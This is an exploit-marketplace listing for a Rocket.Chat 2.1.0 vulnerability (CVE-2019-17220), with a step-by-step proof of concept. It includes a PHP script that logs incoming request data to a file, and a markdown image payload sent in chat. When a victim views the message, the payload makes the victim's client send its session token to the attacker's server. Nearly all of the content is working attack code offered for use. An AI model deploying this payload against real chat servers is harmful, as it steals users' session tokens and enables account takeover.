[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Rocket.Chat 2.1.0 - Cross-Site Scripting Vulnerability

Author
3H34N
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-33405
Category
web applications
Date add
23-10-2019
CVE
CVE-2019-17220
Platform
php
# Title: Rocket.Chat 2.1.0 - Cross-Site Scripting
# Author: 3H34N
# Product: Rocket.Chat
# Vendor: https://rocket.chat/
# Vulnerable Version(s): Rocket.Chat < 2.1.0
# CVE: CVE-2019-17220
# Special Thanks : Ali razmjoo, Mohammad Reza Espargham (@rezesp)

# PoC
# 1. Create l33t.php on a web server

<?php
$output = fopen("logs.txt", "a+") or die("WTF? o.O");
$leet = $_GET['leet']."\n\n";
fwrite($output, $leet);
fclose($output);
?>

# 2. Open a chat session
# 3. Send payload with your web server url

![title](http://10.10.1.5/l33t.php?leet=+`{}token`)

# 4. Token will be written in logs.txt when target seen your message.

#  0day.today [2024-12-25]  #